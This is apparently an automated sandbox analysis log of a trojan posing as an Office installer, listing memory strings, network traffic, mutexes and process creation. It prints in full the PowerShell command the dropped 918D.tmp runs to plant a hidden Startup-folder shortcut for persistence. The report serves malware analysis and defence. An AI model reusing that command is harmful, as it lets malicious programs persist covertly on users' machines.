    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.office.com/client/consent.aspx-16
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stores.office.com/myaccount/api/account.svc/officehubub43
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stores.office.com/myaccount/api/account.svc/subscriptionon
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stores.office.com/myaccount/api/account.svc/subscriptiononey
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/CompliancePolicy/ClientSyncFile/
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/M365.Accesspdates
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/OfficeIntelligence/v1.0/ingestionE
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/OfficeIntelligence/v1.0/insights
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/OfficePersonalizationUserLifecycle/api/facts2hImp
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/puds/v1/me/settings/scan/outputSettings
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/recommended/api/v1.0/edgeworth
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/43-8
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory/V1t
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistoryFlush
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistoryMBI_SSL
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/recommendations
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/recommendedDocuments
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/recommendedDocumentsy
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/searchhistory
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/init
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/initMBI_SSL
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/sharingsuggestion3
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/todob2/api/v1ed1-
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060962016.00000248C320D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, 
OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://syncservice.o365syncservice.com/
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFiles
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFilet
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teams.cloud.microsoft/ups/global/authza
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teams.cloud.microsoft/ups/global/eane-250
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tellmeservice.osi.office.net/tellmeservice/api/suggestionsons
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013075406.00000248C2C06000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2047270961.00000248C2C5B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015326352.00000248C2C4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
    Source: 872C.tmp, 00000003.00000003.1393845975.0000000005614000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393946065.0000000005614000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://templates.office.com/Search/results?ocid=oo_toc_client_app_MARVEL_UPS_templates_gopremiumLan
    Source: unknown Network traffic detected: HTTP traffic on port 54619 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54619
    Source: unknown Network traffic detected: HTTP traffic on port 54614 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54614
    Source: unknown HTTPS traffic detected: 13.107.246.67:443 -> 192.168.2.6:54614 version: TLS 1.2
    Source: unknown HTTPS traffic detected: 13.107.246.67:443 -> 192.168.2.6:54619 version: TLS 1.2
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: RegisterRawInputDevicesmemstr_af68b8c1-1
    Source: C2RINTL.ko-kr.dll.6.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
    Source: AppvIsvSubsystems64_arm64x.dll.6.dr Static PE information: Number of sections : 13 > 10
    Source: AppvIsvSubsystems64.dll.6.dr Static PE information: Number of sections : 11 > 10
    Source: sBvrNv0wtb.exe Static PE information: Number of sections : 11 > 10
    Source: 918D.tmp.0.dr Static PE information: Number of sections : 11 > 10
    Source: sBvrNv0wtb.exe, 00000000.00000003.1314372768.00000197269B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBootstrapper.exeB vs sBvrNv0wtb.exe
    Source: sBvrNv0wtb.exe, 00000000.00000002.1354145817.00007FF61FFC5000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameBootstrapper.exeB vs sBvrNv0wtb.exe
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.000001972884E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBootstrapper.exeB vs sBvrNv0wtb.exe
    Source: sBvrNv0wtb.exe, 00000000.00000003.1347329405.0000019727EA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBootstrapper.exeB vs sBvrNv0wtb.exe
    Source: classification engine Classification label: mal48.troj.evad.winEXE@15/533@1/2
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe File created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates
    Source: C:\Users\user\AppData\Local\Temp\872C.tmp File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\92D9D3BA-E7B7-46A5-889B-6A458BDC8968
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_03
    Source: C:\Windows\System32\OpenWith.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2752:120:WilError_03
    Source: C:\Users\user\AppData\Local\Temp\872C.tmp Mutant created: \Sessions\1\BaseNamedObjects\Local\2BF388D5-6F8C-40A0-A7EE-996D005C4E14_Office16
    Source: C:\Users\user\AppData\Local\Temp\872C.tmp Mutant created: \Sessions\1\BaseNamedObjects\Local\OfficeSetupBootstrapper
    Source: C:\Users\user\AppData\Local\Temp\872C.tmp Mutant created: \Sessions\1\BaseNamedObjects\Office.16.916BB0BF-2D21-4499-83C7-555DB4C3F8E8
    Source: C:\Users\user\AppData\Local\Temp\918D.tmp Mutant created: \Sessions\1\BaseNamedObjects\AsMus
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exe File created: C:\Users\user\AppData\Local\Temp\872C.tmp
    Source: sBvrNv0wtb.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
    Source: unknown Process created: C:\Users\user\Desktop\sBvrNv0wtb.exe "C:\Users\user\Desktop\sBvrNv0wtb.exe"
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exe Process created: C:\Users\user\AppData\Local\Temp\872C.tmp C:\Users\user\AppData\Local\Temp\872C.tmp
    Source: C:\Users\user\AppData\Local\Temp\872C.tmp Process created: C:\Users\user\AppData\Local\Temp\872C.tmp 872C.tmp RELAUNCHED
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exe Process created: C:\Users\user\AppData\Local\Temp\918D.tmp C:\Users\user\AppData\Local\Temp\918D.tmp
    Source: C:\Users\user\AppData\Local\Temp\872C.tmp Process created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe OfficeClickToRun.exe platform=x86 culture=en-us productstoadd=O365HomePremRetail.16_en-us_x-none cdnbaseurl=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 baseurl=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 version=16.0.18526.20168 mediatype=CDN sourcetype=CDN O365HomePremRetail.excludedapps=groove bitnessmigration=False deliverymechanism=492350f6-3a01-4f97-b9c0-c7c6ddf67d60 flt.useoutlookshareaddon=unknown flt.useofficehelperaddon=unknown uninstallcentennial=True scenario=CLIENTUPDATE
    Source: C:\Users\user\AppData\Local\Temp\918D.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command " $StartupFolder = [System.Environment]::GetFolderPath('Startup') $ExePath = 'C:\Users\Public\Music\script\918D.tmp' $ShortcutPath = Join-Path -Path $StartupFolder -ChildPath 'AsMus.lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() "
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknown Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
    Source: C:\Users\user\AppData\Local\Temp\872C.tmp Process created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe OfficeClickToRun.exe platform=x86 culture=en-us productstoadd=O365HomePremRetail.16_en-us_x-none cdnbaseurl.16=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 baseurl.16=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 version.16=16.0.18526.20168 mediatype.16=CDN sourcetype.16=CDN O365HomePremRetail.excludedapps.16=groove bitnessmigration=False deliverymechanism=492350f6-3a01-4f97-b9c0-c7c6ddf67d60 flt.useoutlookshareaddon=unknown flt.useofficehelperaddon=unknown uninstallcentennial=True
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: uxtheme.dllJump to behavior
